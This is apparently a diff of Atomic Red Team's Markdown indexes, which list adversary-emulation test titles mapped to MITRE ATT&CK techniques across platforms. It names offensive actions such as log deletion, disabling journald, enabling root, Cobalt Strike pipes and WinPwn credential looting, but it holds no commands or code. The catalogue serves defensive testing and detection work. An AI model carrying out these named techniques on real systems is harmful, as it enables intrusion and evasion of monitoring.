   - Atomic Test #1: Thread Execution Hijacking [windows]
 - [T1036 Masquerading](../../T1036/T1036.md)
@@ -303,11 +317,13 @@
   - Atomic Test #46: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
   - Atomic Test #47: Event Viewer Registry Modification - Redirection URL [windows]
   - Atomic Test #48: Event Viewer Registry Modification - Redirection Program [windows]
+  - Atomic Test #49: Enabling Remote Desktop Protocol via Remote Registry [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
   - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
   - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
+  - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [macos, linux]
 - [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
   - Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
   - Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
@@ -381,7 +397,8 @@
 - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1612 Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1612 Build Image on Host](../../T1612/T1612.md)
+  - Atomic Test #1: Build Image On Host [containers]
 - T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -413,6 +430,11 @@
 - [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
   - Atomic Test #1: Disable history collection [linux, macos]
   - Atomic Test #2: Mac HISTCONTROL [macos, linux]
+  - Atomic Test #3: Clear bash history [linux]
+  - Atomic Test #4: Setting the HISTCONTROL environment variable [linux]
+  - Atomic Test #5: Setting the HISTFILESIZE environment variable [linux]
+  - Atomic Test #6: Setting the HISTFILE environment variable [linux]
+  - Atomic Test #7: Setting the HISTIGNORE environment variable [linux]
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
   - Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
@@ -665,8 +687,11 @@
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
   - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
@@ -749,6 +774,7 @@
   - Atomic Test #2: Service Installation CMD [windows]
   - Atomic Test #3: Service Installation PowerShell [windows]
   - Atomic Test #4: TinyTurla backdoor service w64time [windows]
+  - Atomic Test #5: Remote Service Installation CMD [windows]
 - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
   - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
   - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
@@ -911,6 +937,7 @@
   - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
   - Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
   - Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
+  - Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
 - [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
   - Atomic Test #1: Add command to .bash_profile [macos, linux]
   - Atomic Test #2: Add command to .bashrc [macos, linux]
@@ -986,8 +1013,11 @@
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1119,7 +1149,12 @@
   - Atomic Test #9: Obfuscated command line scripts [linux]
   - Atomic Test #10: Change login shell [linux]
   - Atomic Test #11: Environment variable scripts [linux]
-- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1559 Inter-Process Communication](../../T1559/T1559.md)
+  - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
+  - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]
+  - Atomic Test #3: Cobalt Strike SSH (postex_ssh) pipe [windows]
+  - Atomic Test #4: Cobalt Strike post-exploitation pipe (4.2 and later) [windows]
+  - Atomic Test #5: Cobalt Strike post-exploitation pipe (before 4.2) [windows]
 - T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1150,6 +1185,7 @@
   - Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
   - Atomic Test #3: psexec.py (Impacket) [linux]
   - Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
+  - Atomic Test #5: Use RemCom to execute a command on a remote host [windows]
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
   - Atomic Test #1: At.exe Scheduled task [windows]
   - Atomic Test #2: At - Schedule a job [linux]
@@ -1209,6 +1245,7 @@
   - Atomic Test #2: Service Installation CMD [windows]
   - Atomic Test #3: Service Installation PowerShell [windows]
   - Atomic Test #4: TinyTurla backdoor service w64time [windows]
+  - Atomic Test #5: Remote Service Installation CMD [windows]
 - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
   - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
   - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
@@ -1407,6 +1444,7 @@
   - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
   - Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
   - Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
+  - Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
 - [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
   - Atomic Test #1: Add command to .bash_profile [macos, linux]
   - Atomic Test #2: Add command to .bashrc [macos, linux]
@@ -1492,8 +1530,11 @@
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1662,9 +1703,9 @@
   - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
   - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
   - Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
-  - Atomic Test #4: SUDO brute force Debian [linux]
-  - Atomic Test #5: SUDO brute force Redhat [linux]
-  - Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
+  - Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
+  - Atomic Test #5: SUDO Brute Force - Debian [linux]
+  - Atomic Test #6: SUDO Brute Force - Redhat [linux]
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
   - Atomic Test #1: Gsecdump [windows]
   - Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -1893,6 +1934,7 @@
   - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
   - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
   - Atomic Test #5: GetCurrent User with PowerShell Script [windows]
+  - Atomic Test #6: System Discovery - SocGholish whoami [windows]
 - [T1613 Container and Resource Discovery](../../T1613/T1613.md)
   - Atomic Test #1: Container and ResourceDiscovery [containers]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2065,6 +2107,7 @@
   - Atomic Test #3: Process Discovery - Get-Process [windows]
   - Atomic Test #4: Process Discovery - get-wmiObject [windows]
   - Atomic Test #5: Process Discovery - wmic process [windows]
+  - Atomic Test #6: Discover Specific Process - tasklist [windows]
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
   - Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
@@ -2094,7 +2137,8 @@
   - Atomic Test #6: Discover System Language by Environment Variable Query [linux]
 - [T1012 Query Registry](../../T1012/T1012.md)
   - Atomic Test #1: Query Registry [windows]
-  - Atomic Test #2: Enumerate COM Objects in Registry with Powershell [windows]
+  - Atomic Test #2: Query Registry with Powershell cmdlets [windows]
+  - Atomic Test #3: Enumerate COM Objects in Registry with Powershell [windows]
 - T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
@@ -2377,6 +2421,8 @@
   - Atomic Test #1: Change User Password - Windows [windows]
   - Atomic Test #2: Delete User - Windows [windows]
   - Atomic Test #3: Remove Account From Domain Admin Group [windows]
+  - Atomic Test #4: Azure AD - Delete user via Azure AD PowerShell [azure-ad]
+  - Atomic Test #5: Azure AD - Delete user via Azure CLI [azure-ad]
 - [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
   - Atomic Test #1: Encrypt files using gpg (Linux) [linux]
   - Atomic Test #2: Encrypt files using 7z (Linux) [linux]
@@ -2454,8 +2500,11 @@
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 
 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -36,8 +36,9 @@
   - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
 - [T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
   - Atomic Test #1: rm -rf [macos, linux]
-  - Atomic Test #2: Overwrite Linux Mail Spool [linux]
-  - Atomic Test #3: Overwrite Linux Log [linux]
+  - Atomic Test #13: Delete system journal logs via rm and journalctl utilities [linux]
+  - Atomic Test #14: Overwrite Linux Mail Spool [linux]
+  - Atomic Test #15: Overwrite Linux Log [linux]
 - T1089 Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
   - Atomic Test #1: Clear Bash history (rm) [linux, macos]
@@ -55,7 +56,9 @@
   - Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
   - Atomic Test #6: Hex decoding with shell utilities [linux, macos]
   - Atomic Test #7: Linux Base64 Encoded Shebang in CLI [linux, macos]
-- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1562 Impair Defenses](../../T1562/T1562.md)
+  - Atomic Test #2: Disable journal logging via systemctl utility [linux]
+  - Atomic Test #3: Disable journal logging via sed utility [linux]
 - T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -81,6 +84,7 @@
 - T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
   - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
+  - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [macos, linux]
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
   - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
@@ -113,6 +117,11 @@
 - [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
   - Atomic Test #1: Disable history collection [linux, macos]
   - Atomic Test #2: Mac HISTCONTROL [macos, linux]
+  - Atomic Test #3: Clear bash history [linux]
+  - Atomic Test #4: Setting the HISTCONTROL environment variable [linux]
+  - Atomic Test #5: Setting the HISTFILESIZE environment variable [linux]
+  - Atomic Test #6: Setting the HISTFILE environment variable [linux]
+  - Atomic Test #7: Setting the HISTIGNORE environment variable [linux]
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
@@ -392,8 +401,8 @@
   - Atomic Test #5: SSHD PAM keylogger [linux]
   - Atomic Test #6: Auditd keylogger [linux]
 - [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
-  - Atomic Test #4: SUDO brute force Debian [linux]
-  - Atomic Test #5: SUDO brute force Redhat [linux]
+  - Atomic Test #5: SUDO Brute Force - Debian [linux]
+  - Atomic Test #6: SUDO Brute Force - Redhat [linux]
 - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -32,6 +32,17 @@
   - Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
 - [T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
   - Atomic Test #1: rm -rf [macos, linux]
+  - Atomic Test #2: Delete log files using built-in log utility [macos]
+  - Atomic Test #3: Truncate system log files via truncate utility [macos]
+  - Atomic Test #4: Delete log files via cat utility by appending /dev/null or /dev/zero [macos]
+  - Atomic Test #5: System log file deletion via find utility [macos]
+  - Atomic Test #6: Overwrite macOS system log via echo utility [macos]
+  - Atomic Test #7: Real-time system log clearance/deletion [macos]
+  - Atomic Test #8: Delete system log files via unlink utility [macos]
+  - Atomic Test #9: Delete system log files using shred utility [macos]
+  - Atomic Test #10: Delete system log files using srm utility [macos]
+  - Atomic Test #11: Delete system log files using OSAScript [macos]
+  - Atomic Test #12: Delete system log files using Applescript [macos]
 - T1089 Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1553.001 Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md)
   - Atomic Test #1: Gatekeeper Bypass [macos]
@@ -68,6 +79,7 @@
 - T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
   - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
+  - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [macos, linux]
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
   - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
@@ -157,6 +169,9 @@
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # collection
@@ -303,6 +318,9 @@
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
 
 # privilege-escalation
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -377,6 +395,9 @@
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
 
 # credential-access
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -662,6 +683,9 @@
 - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
 
 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -230,6 +230,7 @@
   - Atomic Test #46: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
   - Atomic Test #47: Event Viewer Registry Modification - Redirection URL [windows]
   - Atomic Test #48: Event Viewer Registry Modification - Redirection Program [windows]
+  - Atomic Test #49: Enabling Remote Desktop Protocol via Remote Registry [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
   - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -492,8 +493,8 @@
 - T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
   - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
@@ -564,6 +565,7 @@
   - Atomic Test #2: Service Installation CMD [windows]
   - Atomic Test #3: Service Installation PowerShell [windows]
   - Atomic Test #4: TinyTurla backdoor service w64time [windows]
+  - Atomic Test #5: Remote Service Installation CMD [windows]
 - T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
   - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
@@ -681,6 +683,7 @@
   - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
   - Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
   - Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
+  - Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
 - [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
   - Atomic Test #1: Injection SID-History with mimikatz [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
@@ -721,8 +724,8 @@
   - Atomic Test #1: Netsh Helper DLL Registration [windows]
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -815,7 +818,12 @@
   - Atomic Test #22: Abuse Nslookup with DNS Records [windows]
 - T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1559 Inter-Process Communication](../../T1559/T1559.md)
+  - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
+  - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]
+  - Atomic Test #3: Cobalt Strike SSH (postex_ssh) pipe [windows]
+  - Atomic Test #4: Cobalt Strike post-exploitation pipe (4.2 and later) [windows]
+  - Atomic Test #5: Cobalt Strike post-exploitation pipe (before 4.2) [windows]
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -837,6 +845,7 @@
   - Atomic Test #1: Execute a Command as a Service [windows]
   - Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
   - Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
+  - Atomic Test #5: Use RemCom to execute a command on a remote host [windows]
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
   - Atomic Test #1: At.exe Scheduled task [windows]
 - T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -882,6 +891,7 @@
   - Atomic Test #2: Service Installation CMD [windows]
   - Atomic Test #3: Service Installation PowerShell [windows]
   - Atomic Test #4: TinyTurla backdoor service w64time [windows]
+  - Atomic Test #5: Remote Service Installation CMD [windows]
 - [T1137 Office Application Startup](../../T1137/T1137.md)
   - Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
 - T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1020,6 +1030,7 @@
   - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
   - Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
   - Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
+  - Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
   - Atomic Test #1: Authentication Package [windows]
 - T1128 Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1070,8 +1081,8 @@
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1190,7 +1201,7 @@
 - [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
   - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
